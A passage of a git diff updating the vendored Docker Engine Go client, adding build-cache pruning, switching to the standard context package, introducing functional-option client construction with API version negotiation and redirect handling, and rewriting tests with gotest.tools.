/dev/null +++ b/vendor/github.com/docker/docker/client/build_prune.go @@ -0,0 +1,30 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" +) + +// BuildCachePrune requests the daemon to delete unused cache data +func (cli *Client) BuildCachePrune(ctx context.Context) (*types.BuildCachePruneReport, error) { + if err := cli.NewVersionError("1.31", "build prune"); err != nil { + return nil, err + } + + report := types.BuildCachePruneReport{} + + serverResp, err := cli.post(ctx, "/build/prune", nil, nil, nil) + if err != nil { + return nil, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return nil, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return &report, nil +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go index 0effe498be..921024fe4f 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_create.go +++ b/vendor/github.com/docker/docker/client/checkpoint_create.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // CheckpointCreate creates a checkpoint from the given container with the given name diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go index 96e5187618..5703c21904 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_create_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - 
"golang.org/x/net/context" ) func TestCheckpointCreateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go index e6e75588b1..54f55fa76e 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_delete.go +++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // CheckpointDelete deletes the checkpoint with the given name from the given container diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go index a78b050487..117630d61a 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestCheckpointDeleteError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go index 8eb720a6b2..2b73fb553f 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_list.go +++ b/vendor/github.com/docker/docker/client/checkpoint_list.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) -// CheckpointList returns the volumes configured in the docker host. 
+// CheckpointList returns the checkpoints of the given container in the docker host func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) { var checkpoints []types.Checkpoint @@ -19,7 +19,7 @@ func (cli *Client) CheckpointList(ctx context.Context, container string, options resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil) if err != nil { - return checkpoints, err + return checkpoints, wrapResponseError(err, resp, "container", container) } err = json.NewDecoder(resp.body).Decode(&checkpoints) diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go index 6c90f61e8c..d5cfcda0e5 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_list_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestCheckpointListError(t *testing.T) { @@ -55,3 +55,14 @@ func TestCheckpointList(t *testing.T) { t.Fatalf("expected 1 checkpoint, got %v", checkpoints) } } + +func TestCheckpointListContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.CheckpointList(context.Background(), "unknown", types.CheckpointListOptions{}) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go index a9bdab6bb6..b874b3b522 100644 --- a/vendor/github.com/docker/docker/client/client.go +++ b/vendor/github.com/docker/docker/client/client.go @@ -1,10 +1,6 @@ /* 
Package client is a Go client for the Docker Engine API. -The "docker" command uses this package to communicate with the daemon. It can also -be used by your own Go applications to do anything the command-line interface does -– running containers, pulling images, managing swarms, etc. - For more information about the Engine API, see the documentation: https://docs.docker.com/engine/reference/api/ @@ -43,22 +39,29 @@ For example, to list running containers (the equivalent of "docker ps"): } */ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "fmt" + "net" "net/http" "net/url" "os" + "path" "path/filepath" "strings" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" ) -// DefaultVersion is the version of the current stable API -const DefaultVersion string = "1.25" +// ErrRedirect is the error returned by checkRedirect when the request is non-GET. +var ErrRedirect = errors.New("unexpected redirect in response") // Client is the API client that performs all operations // against a docker server. @@ -83,13 +86,39 @@ type Client struct { manualOverride bool } +// CheckRedirect specifies the policy for dealing with redirect responses: +// If the request is non-GET return `ErrRedirect`. Otherwise use the last response. +// +// Go 1.8 changes behavior for HTTP redirects (specifically 301, 307, and 308) in the client . +// The Docker client (and by extension docker API client) can be made to to send a request +// like POST /containers//start where what would normally be in the name section of the URL is empty. +// This triggers an HTTP 301 from the daemon. +// In go 1.8 this 301 will be converted to a GET request, and ends up getting a 404 from the daemon. 
+// This behavior change manifests in the client in that before the 301 was not followed and +// the client did not generate an error, but now results in a message like Error response from daemon: page not found. +func CheckRedirect(req *http.Request, via []*http.Request) error { + if via[0].Method == http.MethodGet { + return http.ErrUseLastResponse + } + return ErrRedirect +} + // NewEnvClient initializes a new API client based on environment variables. -// Use DOCKER_HOST to set the url to the docker server. -// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. -// Use DOCKER_CERT_PATH to load the tls certificates from. -// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. +// See FromEnv for a list of support environment variables. +// +// Deprecated: use NewClientWithOpts(FromEnv) func NewEnvClient() (*Client, error) { - var client *http.Client + return NewClientWithOpts(FromEnv) +} + +// FromEnv configures the client with values from environment variables. +// +// Supported environment variables: +// DOCKER_HOST to set the url to the docker server. +// DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. +// DOCKER_CERT_PATH to load the TLS certificates from. +// DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. 
+func FromEnv(c *Client) error { if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" { options := tlsconfig.Options{ CAFile: filepath.Join(dockerCertPath, "ca.pem"), @@ -99,93 +128,178 @@ func NewEnvClient() (*Client, error) { } tlsc, err := tlsconfig.Client(options) if err != nil { - return nil, err + return err } - client = &http.Client{ - Transport: &http.Transport{ - TLSClientConfig: tlsc, - }, + c.client = &http.Client{ + Transport: &http.Transport{TLSClientConfig: tlsc}, + CheckRedirect: CheckRedirect, } } - host := os.Getenv("DOCKER_HOST") - if host == "" { - host = DefaultDockerHost + if host := os.Getenv("DOCKER_HOST"); host != "" { + if err := WithHost(host)(c); err != nil { + return err + } } - version := os.Getenv("DOCKER_API_VERSION") - if version == "" { - version = DefaultVersion + + if version := os.Getenv("DOCKER_API_VERSION"); version != "" { + c.version = version + c.manualOverride = true } + return nil +} - cli, err := NewClient(host, version, client, nil) - if err != nil { - return cli, err +// WithTLSClientConfig applies a tls config to the client transport. +func WithTLSClientConfig(cacertPath, certPath, keyPath string) func(*Client) error { + return func(c *Client) error { + opts := tlsconfig.Options{ + CAFile: cacertPath, + CertFile: certPath, + KeyFile: keyPath, + ExclusiveRootPools: true, + } + config, err := tlsconfig.Client(opts) + if err != nil { + return errors.Wrap(err, "failed to create tls config") + } + if transport, ok := c.client.Transport.(*http.Transport); ok { + transport.TLSClientConfig = config + return nil + } + return errors.Errorf("cannot apply tls config to transport: %T", c.client.Transport) } - if os.Getenv("DOCKER_API_VERSION") != "" { - cli.manualOverride = true +} + +// WithDialer applies the dialer.DialContext to the client transport. This can be +// used to set the Timeout and KeepAlive settings of the client. 
+func WithDialer(dialer *net.Dialer) func(*Client) error { + return func(c *Client) error { + if transport, ok := c.client.Transport.(*http.Transport); ok { + transport.DialContext = dialer.DialContext + return nil + } + return errors.Errorf("cannot apply dialer to transport: %T", c.client.Transport) } - return cli, nil } -// NewClient initializes a new API client for the given host and API version. -// It uses the given http client as transport. +// WithVersion overrides the client version with the specified one +func WithVersion(version string) func(*Client) error { + return func(c *Client) error { + c.version = version + return nil + } +} + +// WithHost overrides the client host with the specified one. +func WithHost(host string) func(*Client) error { + return func(c *Client) error { + hostURL, err := ParseHostURL(host) + if err != nil { + return err + } + c.host = host + c.proto = hostURL.Scheme + c.addr = hostURL.Host + c.basePath = hostURL.Path + if transport, ok := c.client.Transport.(*http.Transport); ok { + return sockets.ConfigureTransport(transport, c.proto, c.addr) + } + return errors.Errorf("cannot apply host to transport: %T", c.client.Transport) + } +} + +// WithHTTPClient overrides the client http client with the specified one +func WithHTTPClient(client *http.Client) func(*Client) error { + return func(c *Client) error { + if client != nil { + c.client = client + } + return nil + } +} + +// WithHTTPHeaders overrides the client default http headers +func WithHTTPHeaders(headers map[string]string) func(*Client) error { + return func(c *Client) error { + c.customHTTPHeaders = headers + return nil + } +} + +// NewClientWithOpts initializes a new API client with default values. It takes functors +// to modify values when creating it, like `NewClientWithOpts(WithVersion(…))` // It also initializes the custom http headers to add to each request. // // It won't send any version information if the version number is empty. 
It is // highly recommended that you set a version or your client may break if the // server is upgraded. -func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { - proto, addr, basePath, err := ParseHost(host) +func NewClientWithOpts(ops ...func(*Client) error) (*Client, error) { + client, err := defaultHTTPClient(DefaultDockerHost) if err != nil { return nil, err } + c := &Client{ + host: DefaultDockerHost, + version: api.DefaultVersion, + scheme: "http", + client: client, + proto: defaultProto, + addr: defaultAddr, + } - if client != nil { - if _, ok := client.Transport.(*http.Transport); !ok { - return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport) - } - } else { - transport := new(http.Transport) - sockets.ConfigureTransport(transport, proto, addr) - client = &http.Client{ - Transport: transport, + for _, op := range ops { + if err := op(c); err != nil { + return nil, err } } - scheme := "http" - tlsConfig := resolveTLSConfig(client.Transport) + if _, ok := c.client.Transport.(http.RoundTripper); !ok { + return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", c.client.Transport) + } + tlsConfig := resolveTLSConfig(c.client.Transport) if tlsConfig != nil { // TODO(stevvooe): This isn't really the right way to write clients in Go. // `NewClient` should probably only take an `*http.Client` and work from there. // Unfortunately, the model of having a host-ish/url-thingy as the connection // string has us confusing protocol and transport layers. We continue doing // this to avoid breaking existing clients but this should be addressed. 
- scheme = "https" - } - - return &Client{ - scheme: scheme, - host: host, - proto: proto, - addr: addr, - basePath: basePath, - client: client, - version: version, - customHTTPHeaders: httpHeaders, + c.scheme = "https" + } + + return c, nil +} + +func defaultHTTPClient(host string) (*http.Client, error) { + url, err := ParseHostURL(host) + if err != nil { + return nil, err + } + transport := new(http.Transport) + sockets.ConfigureTransport(transport, url.Scheme, url.Host) + return &http.Client{ + Transport: transport, + CheckRedirect: CheckRedirect, }, nil } -// Close ensures that transport.Client is closed -// especially needed while using NewClient with *http.Client = nil -// for example -// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"}) -func (cli *Client) Close() error { +// NewClient initializes a new API client for the given host and API version. +// It uses the given http client as transport. +// It also initializes the custom http headers to add to each request. +// +// It won't send any version information if the version number is empty. It is +// highly recommended that you set a version or your client may break if the +// server is upgraded. 
+// Deprecated: use NewClientWithOpts +func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { + return NewClientWithOpts(WithHost(host), WithVersion(version), WithHTTPClient(client), WithHTTPHeaders(httpHeaders)) +} +// Close the transport used by the client +func (cli *Client) Close() error { if t, ok := cli.client.Transport.(*http.Transport); ok { t.CloseIdleConnections() } - return nil } @@ -195,41 +309,64 @@ func (cli *Client) getAPIPath(p string, query url.Values) string { var apiPath string if cli.version != "" { v := strings.TrimPrefix(cli.version, "v") - apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p) + apiPath = path.Join(cli.basePath, "/v"+v, p) } else { - apiPath = fmt.Sprintf("%s%s", cli.basePath, p) + apiPath = path.Join(cli.basePath, p) } - - u := &url.URL{ - Path: apiPath, - } - if len(query) > 0 { - u.RawQuery = query.Encode() - } - return u.String() + return (&url.URL{Path: apiPath, RawQuery: query.Encode()}).String() } -// ClientVersion returns the version string associated with this -// instance of the Client. Note that this value can be changed -// via the DOCKER_API_VERSION env var. +// ClientVersion returns the API version used by this client. func (cli *Client) ClientVersion() string { return cli.version } -// UpdateClientVersion updates the version string associated with this -// instance of the Client. -func (cli *Client) UpdateClientVersion(v string) { - if !cli.manualOverride { - cli.version = v +// NegotiateAPIVersion queries the API and updates the version to match the +// API version. Any errors are silently ignored. +func (cli *Client) NegotiateAPIVersion(ctx context.Context) { + ping, _ := cli.Ping(ctx) + cli.NegotiateAPIVersionPing(ping) +} + +// NegotiateAPIVersionPing updates the client version to match the Ping.APIVersion +// if the ping version is less than the default version. 
+func (cli *Client) NegotiateAPIVersionPing(p types.Ping) { + if cli.manualOverride { + return } + // try the latest version before versioning headers existed + if p.APIVersion == "" { + p.APIVersion = "1.24" + } + + // if the client is not initialized with a version, start with the latest supported version + if cli.version == "" { + cli.version = api.DefaultVersion + } + + // if server version is lower than the client version, downgrade + if versions.LessThan(p.APIVersion, cli.version) { + cli.version = p.APIVersion + } } -// ParseHost verifies that the given host strings is valid. -func ParseHost(host string) (string, string, string, error) { +// DaemonHost returns the host address used by the client +func (cli *Client) DaemonHost() string { + return cli.host +} + +// HTTPClient returns a copy of the HTTP client bound to the server +func (cli *Client) HTTPClient() *http.Client { + return &*cli.client +} + +// ParseHostURL parses a url string, validates the string is a host url, and +// returns the parsed URL +func ParseHostURL(host string) (*url.URL, error) { protoAddrParts := strings.SplitN(host, "://", 2) if len(protoAddrParts) == 1 { - return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host) + return nil, fmt.Errorf("unable to parse docker host `%s`", host) } var basePath string @@ -237,10 +374,29 @@ func ParseHost(host string) (string, string, string, error) { if proto == "tcp" { parsed, err := url.Parse("tcp://" + addr) if err != nil { - return "", "", "", err + return nil, err } addr = parsed.Host basePath = parsed.Path } - return proto, addr, basePath, nil + return &url.URL{ + Scheme: proto, + Host: addr, + Path: basePath, + }, nil +} + +// CustomHTTPHeaders returns the custom http headers stored by the client. 
+func (cli *Client) CustomHTTPHeaders() map[string]string { + m := make(map[string]string) + for k, v := range cli.customHTTPHeaders { + m[k] = v + } + return m +} + +// SetCustomHTTPHeaders that will be set on every HTTP request made by the client. +// Deprecated: use WithHTTPHeaders when creating the client. +func (cli *Client) SetCustomHTTPHeaders(headers map[string]string) { + cli.customHTTPHeaders = headers } diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go index 0ab935d536..390a1eed7d 100644 --- a/vendor/github.com/docker/docker/client/client_mock_test.go +++ b/vendor/github.com/docker/docker/client/client_mock_test.go @@ -1,4 +1,4 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" @@ -9,6 +9,14 @@ import ( "github.com/docker/docker/api/types" ) +// transportFunc allows us to inject a mock transport for testing. We define it +// here so we can detect the tlsconfig and return nil for only this type. 
+type transportFunc func(*http.Request) (*http.Response, error) + +func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return tf(req) +} + func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client { return &http.Client{ Transport: transportFunc(doer), diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go index ee199c2bec..58bccaa311 100644 --- a/vendor/github.com/docker/docker/client/client_test.go +++ b/vendor/github.com/docker/docker/client/client_test.go @@ -1,145 +1,115 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" - "encoding/json" - "io/ioutil" "net/http" "net/url" "os" "runtime" - "strings" "testing" + "github.com/docker/docker/api" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/env" + "gotest.tools/skip" ) func TestNewEnvClient(t *testing.T) { - if runtime.GOOS == "windows" { - t.Skip("skipping unix only test for windows") - } - cases := []struct { + skip.If(t, runtime.GOOS == "windows") + + testcases := []struct { + doc string envs map[string]string expectedError string expectedVersion string }{ { + doc: "default api version", envs: map[string]string{}, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "invalid cert path", envs: map[string]string{ "DOCKER_CERT_PATH": "invalid/path", }, - expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. 
Make sure the key is not encrypted", + expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory", }, { + doc: "default api version with cert path", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "default api version with cert path and tls verify", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", "DOCKER_TLS_VERIFY": "1", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "default api version with cert path and host", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", "DOCKER_HOST": "https://notaunixsocket", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "invalid docker host", envs: map[string]string{ "DOCKER_HOST": "host", }, expectedError: "unable to parse docker host `host`", }, { + doc: "invalid docker host, with good format", envs: map[string]string{ "DOCKER_HOST": "invalid://url", }, - expectedVersion: DefaultVersion, - }, - { - envs: map[string]string{ - "DOCKER_API_VERSION": "anything", - }, - expectedVersion: "anything", + expectedVersion: api.DefaultVersion, }, { + doc: "override api version", envs: map[string]string{ "DOCKER_API_VERSION": "1.22", }, expectedVersion: "1.22", }, } - for _, c := range cases { - recoverEnvs := setupEnvs(t, c.envs) + + defer env.PatchAll(t, nil)() + for _, c := range testcases { + env.PatchAll(t, c.envs) apiclient, err := NewEnvClient() if c.expectedError != "" { - if err == nil { - t.Errorf("expected an error for %v", c) - } else if err.Error() != c.expectedError { - t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c) - } + assert.Check(t, is.Error(err, c.expectedError), c.doc) } else { - if err != nil { - t.Error(err) - } + assert.Check(t, err, c.doc) version := apiclient.ClientVersion() - if version != c.expectedVersion { - t.Errorf("expected %s, got %s, for 
%v", c.expectedVersion, version, c) - } + assert.Check(t, is.Equal(c.expectedVersion, version), c.doc) } if c.envs["DOCKER_TLS_VERIFY"] != "" { // pedantic checking that this is handled correctly tr := apiclient.client.Transport.(*http.Transport) - if tr.TLSClientConfig == nil { - t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled") - } - - if tr.TLSClientConfig.InsecureSkipVerify { - t.Errorf("tls verification should be enabled") - } - } - - recoverEnvs(t) - } -} - -func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) { - oldEnvs := map[string]string{} - for key, value := range envs { - oldEnv := os.Getenv(key) - oldEnvs[key] = oldEnv - err := os.Setenv(key, value) - if err != nil { - t.Error(err) - } - } - return func(t *testing.T) { - for key, value := range oldEnvs { - err := os.Setenv(key, value) - if err != nil { - t.Error(err) - } + assert.Assert(t, tr.TLSClientConfig != nil, c.doc) + assert.Check(t, is.Equal(tr.TLSClientConfig.InsecureSkipVerify, false), c.doc) } } } func TestGetAPIPath(t *testing.T) { - cases := []struct { - v string - p string - q url.Values - e string + testcases := []struct { + version string + path string + query url.Values + expected string }{ {"", "/containers/json", nil, "/containers/json"}, {"", "/containers/json", url.Values{}, "/containers/json"}, @@ -153,118 +123,63 @@ func TestGetAPIPath(t *testing.T) { {"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"}, } - for _, cs := range cases { - c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil) - if err != nil { - t.Fatal(err) - } - g := c.getAPIPath(cs.p, cs.q) - if g != cs.e { - t.Fatalf("Expected %s, got %s", cs.e, g) - } - - err = c.Close() - if nil != err { - t.Fatalf("close client failed, error message: %s", err) - } - } -} - -func TestParseHost(t *testing.T) { - cases := []struct { - host string - proto string - addr string - base string - err bool - }{ - {"", "", "", "", true}, - {"foobar", "", "", "", true}, - 
{"foo://bar", "foo", "bar", "", false}, - {"tcp://localhost:2476", "tcp", "localhost:2476", "", false}, - {"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false}, - } - - for _, cs := range cases { - p, a, b, e := ParseHost(cs.host) - if cs.err && e == nil { - t.Fatalf("expected error, got nil") - } - if !cs.err && e != nil { - t.Fatal(e) - } - if cs.proto != p { - t.Fatalf("expected proto %s, got %s", cs.proto, p) - } - if cs.addr != a { - t.Fatalf("expected addr %s, got %s", cs.addr, a) - } - if cs.base != b { - t.Fatalf("expected base %s, got %s", cs.base, b) - } + for _, testcase := range testcases { + c := Client{version: testcase.version, basePath: "/"} + actual := c.getAPIPath(testcase.path, testcase.query) + assert.Check(t, is.Equal(actual, testcase.expected)) } } -func TestUpdateClientVersion(t *testing.T) { - client := &Client{ - client: newMockClient(func(req *http.Request) (*http.Response, error) { - splitQuery := strings.Split(req.URL.Path, "/") - queryVersion := splitQuery[1] - b, err := json.Marshal(types.Version{ - APIVersion: queryVersion, - }) - if err != nil { - return nil, err - } - return &http.Response{ - StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(b)), - }, nil - }), - } - - cases := []struct { - v string +func TestParseHostURL(t *testing.T) { + testcases := []struct { + host string + expected *url.URL + expectedErr string }{ - {"1.20"}, - {"v1.21"}, - {"1.22"}, - {"v1.22"}, + { + host: "", + expectedErr: "unable to parse docker host", + }, + { + host: "foobar", + expectedErr: "unable to parse docker host", + }, + { + host: "foo://bar", + expected: &url.URL{Scheme: "foo", Host: "bar"}, + }, + { + host: "tcp://localhost:2476", + expected: &url.URL{Scheme: "tcp", Host: "localhost:2476"}, + }, + { + host: "tcp://localhost:2476/path", + expected: &url.URL{Scheme: "tcp", Host: "localhost:2476", Path: "/path"}, + }, } - for _, cs := range cases { - client.UpdateClientVersion(cs.v) - r, err := 
client.ServerVersion(context.Background()) - if err != nil { - t.Fatal(err) - } - if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") { - t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion) + for _, testcase := range testcases { + actual, err := ParseHostURL(testcase.host) + if testcase.expectedErr != "" { + assert.Check(t, is.ErrorContains(err, testcase.expectedErr)) } + assert.Check(t, is.DeepEqual(testcase.expected, actual)) } } func TestNewEnvClientSetsDefaultVersion(t *testing.T) { - // Unset environment variables - envVarKeys := []string{ - "DOCKER_HOST", - "DOCKER_API_VERSION", - "DOCKER_TLS_VERIFY", - "DOCKER_CERT_PATH", - } - envVarValues := make(map[string]string) - for _, key := range envVarKeys { - envVarValues[key] = os.Getenv(key) - os.Setenv(key, "") - } + defer env.PatchAll(t, map[string]string{ + "DOCKER_HOST": "", + "DOCKER_API_VERSION": "", + "DOCKER_TLS_VERIFY": "", + "DOCKER_CERT_PATH": "", + })() client, err := NewEnvClient() if err != nil { t.Fatal(err) } - if client.version != DefaultVersion { - t.Fatalf("Expected %s, got %s", DefaultVersion, client.version) - } + assert.Check(t, is.Equal(client.version, api.DefaultVersion)) expected := "1.22" os.Setenv("DOCKER_API_VERSION", expected) @@ -272,12 +187,135 @@ func TestNewEnvClientSetsDefaultVersion(t *testing.T) { if err != nil { t.Fatal(err) } - if client.version != expected { - t.Fatalf("Expected %s, got %s", expected, client.version) + assert.Check(t, is.Equal(expected, client.version)) +} + +// TestNegotiateAPIVersionEmpty asserts that client.Client can +// negotiate a compatible APIVersion when omitted +func TestNegotiateAPIVersionEmpty(t *testing.T) { + defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": ""})() + + client, err := NewEnvClient() + assert.NilError(t, err) + + ping := types.Ping{ + APIVersion: "", + OSType: "linux", + Experimental: false, + } + + // set our version to something new + client.version = "1.25" + + // if no version from server, 
expect the earliest + // version before APIVersion was implemented + expected := "1.24" + + // test downgrade + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) +} + +// TestNegotiateAPIVersion asserts that client.Client can +// negotiate a compatible APIVersion with the server +func TestNegotiateAPIVersion(t *testing.T) { + client, err := NewEnvClient() + assert.NilError(t, err) + + expected := "1.21" + ping := types.Ping{ + APIVersion: expected, + OSType: "linux", + Experimental: false, + } + + // set our version to something new + client.version = "1.22" + + // test downgrade + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) + + // set the client version to something older, and verify that we keep the + // original setting. + expected = "1.20" + client.version = expected + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) + +} + +// TestNegotiateAPIVersionOverride asserts that we honor +// the environment variable DOCKER_API_VERSION when negotiating versions +func TestNegotiateAPVersionOverride(t *testing.T) { + expected := "9.99" + defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": expected})() + + client, err := NewEnvClient() + assert.NilError(t, err) + + ping := types.Ping{ + APIVersion: "1.24", + OSType: "linux", + Experimental: false, + } + + // test that we honored the env var + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) +} + +type roundTripFunc func(*http.Request) (*http.Response, error) + +func (rtf roundTripFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return rtf(req) +} + +type bytesBufferClose struct { + *bytes.Buffer +} + +func (bbc bytesBufferClose) Close() error { + return nil +} + +func TestClientRedirect(t *testing.T) { + client := &http.Client{ + CheckRedirect: CheckRedirect, + Transport: roundTripFunc(func(req *http.Request) (*http.Response, 
error) { + if req.URL.String() == "/bla" { + return &http.Response{StatusCode: 404}, nil + } + return &http.Response{ + StatusCode: 301, + Header: map[string][]string{"Location": {"/bla"}}, + Body: bytesBufferClose{bytes.NewBuffer(nil)}, + }, nil + }), + } + + cases := []struct { + httpMethod string + expectedErr *url.Error + statusCode int + }{ + {http.MethodGet, nil, 301}, + {http.MethodPost, &url.Error{Op: "Post", URL: "/bla", Err: ErrRedirect}, 301}, + {http.MethodPut, &url.Error{Op: "Put", URL: "/bla", Err: ErrRedirect}, 301}, + {http.MethodDelete, &url.Error{Op: "Delete", URL: "/bla", Err: ErrRedirect}, 301}, } - // Restore environment variables - for _, key := range envVarKeys { - os.Setenv(key, envVarValues[key]) + for _, tc := range cases { + req, err := http.NewRequest(tc.httpMethod, "/redirectme", nil) + assert.Check(t, err) + resp, err := client.Do(req) + assert.Check(t, is.Equal(tc.statusCode, resp.StatusCode)) + if tc.expectedErr == nil { + assert.Check(t, is.Nil(err)) + } else { + urlError, ok := err.(*url.Error) + assert.Assert(t, ok, "%T is not *url.Error", err) + assert.Check(t, is.Equal(*tc.expectedErr, *urlError)) + } } } diff --git a/vendor/github.com/docker/docker/client/client_unix.go b/vendor/github.com/docker/docker/client/client_unix.go index 89de892c85..3d24470ba3 100644 --- a/vendor/github.com/docker/docker/client/client_unix.go +++ b/vendor/github.com/docker/docker/client/client_unix.go @@ -1,6 +1,9 @@ -// +build linux freebsd solaris openbsd darwin +// +build linux freebsd openbsd darwin -package client +package client // import "github.com/docker/docker/client" // DefaultDockerHost defines os specific default if DOCKER_HOST is unset const DefaultDockerHost = "unix:///var/run/docker.sock" + +const defaultProto = "unix" +const defaultAddr = "/var/run/docker.sock" diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go index 07c0c7a774..c649e54412 100644 --- 
